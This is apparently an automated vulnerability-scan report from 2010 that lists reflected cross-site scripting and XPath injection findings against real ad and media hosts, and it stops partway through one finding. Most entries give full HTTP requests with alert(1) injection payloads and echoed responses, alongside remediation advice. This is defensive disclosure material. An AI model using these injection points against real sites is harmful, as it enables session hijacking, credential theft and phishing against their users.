GET /static/js%00'/jquery.cookies.js HTTP/1.1 Host: media.washtimes.com Proxy-Connection: keep-alive Referer: http://www.washingtontimes.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK <!--: spam Content-Type: text/html Date: Mon, 13 Dec 2010 21:22:32 GMT Server: lighttpd/1.4.26 Connection: close
The REST URL parameter 3 appears to be vulnerable to XPath injection attacks. The payload %00' was submitted in the REST URL parameter 3, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request
GET /static/js/jquery.cookies.js%00' HTTP/1.1 Host: media.washtimes.com Proxy-Connection: keep-alive Referer: http://www.washingtontimes.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK <!--: spam Content-Type: text/html Date: Mon, 13 Dec 2010 21:22:34 GMT Server: lighttpd/1.4.26 Connection: close
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc.).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload aa31c<script>alert(1)</script>ed828a88755 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adaa31c<script>alert(1)</script>ed828a88755/q1.test/home HTTP/1.1 Host: a.collective-media.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dc=dal-dc; optout=1; JY57=opt_out;
Response
HTTP/1.1 404 Not Found Server: nginx/0.7.65 Content-Type: text/html Content-Length: 70 Vary: Accept-Encoding Date: Mon, 13 Dec 2010 21:39:00 GMT Connection: close Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c45f9'-alert(1)-'ff4bef350e6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/q1.testc45f9'-alert(1)-'ff4bef350e6/home;kw=additional_macys_adultpromo_washingtontimes_120910to121310;sz=160x600;click=http://ad.doubleclick.net/click%3Bh%3Dv8/3a6f/3/0/%2a/l%3B233354357%3B0-0%3B1%3B37858617%3B2321-160/600%3B39716168/39733955/1%3B%3B~sscs%3D%3f;ord=7575965? HTTP/1.1 Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.washingtontimes.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: optout=1; dc=dal-dc
Response
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 499 Date: Mon, 13 Dec 2010 21:23:36 GMT Connection: close Vary: Accept-Encoding Set-Cookie: dc=dal-dc; domain=collective-media.net; path=/; expires=Wed, 12-Jan-2011 21:23:36 GMT Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bc06e'-alert(1)-'9ad47f86a1b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/q1.test/homebc06e'-alert(1)-'9ad47f86a1b;kw=additional_macys_adultpromo_washingtontimes_120910to121310;sz=160x600;click=http://ad.doubleclick.net/click%3Bh%3Dv8/3a6f/3/0/%2a/l%3B233354357%3B0-0%3B1%3B37858617%3B2321-160/600%3B39716168/39733955/1%3B%3B~sscs%3D%3f;ord=7575965? HTTP/1.1 Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.washingtontimes.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: optout=1; dc=dal-dc
Response
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 499 Date: Mon, 13 Dec 2010 21:23:36 GMT Connection: close Vary: Accept-Encoding Set-Cookie: dc=dal-dc; domain=collective-media.net; path=/; expires=Wed, 12-Jan-2011 21:23:36 GMT Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
The value of the kw request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3cfb2'-alert(1)-'4ea1f05b3e8 was submitted in the kw parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/q1.test/home;kw=additional_macys_adultpromo_washingtontimes_120910to121310;sz=160x600;click=http://ad.doubleclick.net/click%3Bh%3Dv8/3a6f/3/0/%2a/l%3B233354357%3B0-0%3B1%3B37858617%3B2321-160/600%3B39716168/39733955/1%3B%3B~sscs%3D%3f;ord=7575965?3cfb2'-alert(1)-'4ea1f05b3e8 HTTP/1.1 Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.washingtontimes.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: optout=1; dc=dal-dc
Response
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 500 Date: Mon, 13 Dec 2010 21:23:34 GMT Connection: close Vary: Accept-Encoding Set-Cookie: dc=dal-dc; domain=collective-media.net; path=/; expires=Wed, 12-Jan-2011 21:23:34 GMT Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
3.5. http://a.collective-media.net/adj/q1.test/home [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://a.collective-media.net
Path: /adj/q1.test/home
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2cd76'-alert(1)-'d748450ef4a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/q1.test/home;kw=additional_macys_adultpromo_washingtontimes_120910to121310;sz=160x600;click=http://ad.doubleclick.net/click%3Bh%3Dv8/3a6f/3/0/%2a/l%3B233354357%3B0-0%3B1%3B37858617%3B2321-160/600%3B39716168/39733955/1%3B%3B~sscs%3D%3f;ord=7575965?&2cd76'-alert(1)-'d748450ef4a=1 HTTP/1.1 Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.washingtontimes.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: optout=1; dc=dal-dc
Response
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 503 Date: Mon, 13 Dec 2010 21:23:35 GMT Connection: close Vary: Accept-Encoding Set-Cookie: dc=dal-dc; domain=collective-media.net; path=/; expires=Wed, 12-Jan-2011 21:23:35 GMT Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a8f08'-alert(1)-'88782b9c971 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cmadja8f08'-alert(1)-'88782b9c971/q1.test/home;kw=additional_macys_adultpromo_washingtontimes_120910to121310;sz=160x600;net=q1;ord=7575965;ord1=131729;cmpgurl=http%253A//www.washingtontimes.com/? HTTP/1.1 Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.washingtontimes.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: optout=1; dc=dal-dc
Response
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Vary: Accept-Encoding Date: Mon, 13 Dec 2010 21:23:39 GMT Connection: close Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net Content-Length: 7199
function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this. ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-95227715_1292275419","http://ad.doubleclick.net/adja8f08'-alert(1)-'88782b9c971/q1.test/home;net=q1;u=,q1-95227715_1292275419,,Miscellaneous,;;kw=additional_macys_adultpromo_washingtontimes_120910to121310;cmw=owl;sz=160x600;net=q1;ord1=131729;contx=Miscellaneous;dc=d;btg=;ord=757 ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 84a5b'-alert(1)-'35cfa1c342 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cmadj/q1.test84a5b'-alert(1)-'35cfa1c342/home;kw=additional_macys_adultpromo_washingtontimes_120910to121310;sz=160x600;net=q1;ord=7575965;ord1=131729;cmpgurl=http%253A//www.washingtontimes.com/? HTTP/1.1 Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.washingtontimes.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: optout=1; dc=dal-dc
Response
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Vary: Accept-Encoding Date: Mon, 13 Dec 2010 21:23:39 GMT Connection: close Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net Content-Length: 7190
function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this. ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-35825100_1292275419","http://ad.doubleclick.net/adj/q1.test84a5b'-alert(1)-'35cfa1c342/home;net=q1;u=,q1-35825100_1292275419,,Miscellaneous,;;kw=additional_macys_adultpromo_washingtontimes_120910to121310;sz=160x600;net=q1;ord1=131729;contx=Miscellaneous;dc=d;btg=;ord=7575965?","160","60 ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 11f44'-alert(1)-'12f5b97a78e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cmadj/q1.test/home11f44'-alert(1)-'12f5b97a78e;kw=additional_macys_adultpromo_washingtontimes_120910to121310;sz=160x600;net=q1;ord=7575965;ord1=131729;cmpgurl=http%253A//www.washingtontimes.com/? HTTP/1.1 Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.washingtontimes.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: optout=1; dc=dal-dc
Response
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Vary: Accept-Encoding Date: Mon, 13 Dec 2010 21:23:39 GMT Connection: close Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net Content-Length: 7191
function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this. ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-37895462_1292275419","http://ad.doubleclick.net/adj/q1.test/home11f44'-alert(1)-'12f5b97a78e;net=q1;u=,q1-37895462_1292275419,,Miscellaneous,;;kw=additional_macys_adultpromo_washingtontimes_120910to121310;sz=160x600;net=q1;ord1=131729;contx=Miscellaneous;dc=d;btg=;ord=7575965?","160","600",fa ...[SNIP]...
The value of the kw request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 95357'-alert(1)-'8587974a684 was submitted in the kw parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cmadj/q1.test/home;kw=95357'-alert(1)-'8587974a684 HTTP/1.1 Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.washingtontimes.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: optout=1; dc=dal-dc
Response
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Vary: Accept-Encoding Date: Mon, 13 Dec 2010 21:23:37 GMT Connection: close Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net Content-Length: 7069
function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this. ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-83672091_1292275417","http://ad.doubleclick.net/adj/q1.test/home;net=q1;u=,q1-83672091_1292275417,,none,;;kw=95357'-alert(1)-'8587974a684;contx=none;dc=d;btg=?","0","0",false);</scr'+'ipt> ...[SNIP]...
3.10. http://a.collective-media.net/cmadj/q1.test/home [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://a.collective-media.net
Path: /cmadj/q1.test/home
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 42430'-alert(1)-'23afa6ec51c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cmadj/q1.test/home?42430'-alert(1)-'23afa6ec51c=1 HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dal-dc; optout=1; JY57=opt_out;
Response
HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 7065
Date: Mon, 13 Dec 2010 21:38:59 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this. ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-80828934_1292276339","http://ad.doubleclick.net//q1.test/home?42430'-alert(1)-'23afa6ec51c=1;net=q1;u=,q1-80828934_1292276339,,none,;;contx=none;dc=d;btg=?","0","0",false);</scr'+'ipt> ...[SNIP]...
The value of the mpt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a9d92"-alert(1)-"2d4784f5ced was submitted in the mpt parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cm/js/9826-95389-2653-9?mpt=7568887a9d92"-alert(1)-"2d4784f5ced&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3a6f/3/0/%2a/f%3B222302661%3B0-0%3B0%3B37858617%3B4307-300/250%3B35790835/35808676/1%3B%3B%7Esscs%3D%3f HTTP/1.1
Host: cdn4.eyewonder.com
Proxy-Connection: keep-alive
Referer: http://www.washingtontimes.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=70531435002; mojo3=10295:1039
var failclickTag_1358607 = "http://ad.doubleclick.net/click;h=v8/3a6f/3/0/*/f;222302661;0-0;0;37858617;4307-300/250;35790835/35808676/1;;~sscs=?http://cdn4.eyewonder.com/cm/ck/9826-95389-2653-9?mpt=7568887a9d92"-alert(1)-"2d4784f5ced&6034571=0"; var clickTag1_1358607 = "http://ad.doubleclick.net/click;h=v8/3a6f/3/0/*/f;222302661;0-0;0;37858617;4307-300/250;35790835/35808676/1;;~sscs=?http://cdn4.eyewonder.com/cm/ck/9826-95389-2653 ...[SNIP]...
The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ff0c5"%3balert(1)//29754010ca5 was submitted in the mpvc parameter. This input was echoed as ff0c5";alert(1)//29754010ca5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cm/js/9826-95389-2653-9?mpt=7568887&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3a6f/3/0/%2a/f%3B222302661%3B0-0%3B0%3B37858617%3B4307-300/250%3B35790835/35808676/1%3B%3B%7Esscs%3D%3fff0c5"%3balert(1)//29754010ca5 HTTP/1.1
Host: cdn4.eyewonder.com
Proxy-Connection: keep-alive
Referer: http://www.washingtontimes.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=70531435002; mojo3=10295:1039
var failclickTag_1358607 = "http://ad.doubleclick.net/click;h=v8/3a6f/3/0/*/f;222302661;0-0;0;37858617;4307-300/250;35790835/35808676/1;;~sscs=?ff0c5";alert(1)//29754010ca5http://cdn4.eyewonder.com/cm/ck/9826-95389-2653-9?mpt=7568887&6034571=0"; var clickTag1_1358607 = "http://ad.doubleclick.net/click;h=v8/3a6f/3/0/*/f;222302661;0-0;0;37858617;4307-300/250;35790835/35808 ...[SNIP]...
3.13. http://cdn4.eyewonder.com/cm/js/9826-95389-2653-9 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://cdn4.eyewonder.com
Path: /cm/js/9826-95389-2653-9
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b0f6d"-alert(1)-"15ac2a66929 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cm/js/9826-95389-2653-9?b0f6d"-alert(1)-"15ac2a66929=1 HTTP/1.1
Host: cdn4.eyewonder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mojo3=10295:1039; svid=70531435002;
var failclickTag_1358607 = "<mpvc/>http://cdn4.eyewonder.com/cm/ck/9826-95389-2653-9?b0f6d"-alert(1)-"15ac2a66929=1&6034571=0"; var clickTag1_1358607 = "<mpvc/>http://cdn4.eyewonder.com/cm/ck/9826-953 ...[SNIP]...
The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b6641"%3balert(1)//b5039ce5801 was submitted in the mpck parameter. This input was echoed as b6641";alert(1)//b5039ce5801 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /content/0/9826/95389/WashingtonTimes-300-250-GE_EcoQuiz_300x250_2-Banner-1358607.js?mpck=cdn4.eyewonder.com%2Fcm%2Fck%2F9826-95389-2653-9%3Fmpt%3D7568887b6641"%3balert(1)//b5039ce5801&mpt=7568887&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3a6f/3/0/%2a/f%3B222302661%3B0-0%3B0%3B37858617%3B4307-300/250%3B35790835/35808676/1%3B%3B%7Esscs%3D%3f HTTP/1.1
Host: cdn4.eyewonder.com
Proxy-Connection: keep-alive
Referer: http://www.washingtontimes.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=70531435002; mojo3=10295:1039
var failclickTag_1358607 = "http://ad.doubleclick.net/click;h=v8/3a6f/3/0/*/f;222302661;0-0;0;37858617;4307-300/250;35790835/35808676/1;;~sscs=?http://cdn4.eyewonder.com/cm/ck/9826-95389-2653-9?mpt=7568887b6641";alert(1)//b5039ce5801&6034571=0"; var clickTag1_1358607 = "http://ad.doubleclick.net/click;h=v8/3a6f/3/0/*/f;222302661;0-0;0;37858617;4307-300/250;35790835/35808676/1;;~sscs=?http://cdn4.eyewonder.com/cm/ck/9826-95389-2653 ...[SNIP]...
The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 58455"%3balert(1)//53519a2a4b7 was submitted in the mpvc parameter. This input was echoed as 58455";alert(1)//53519a2a4b7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
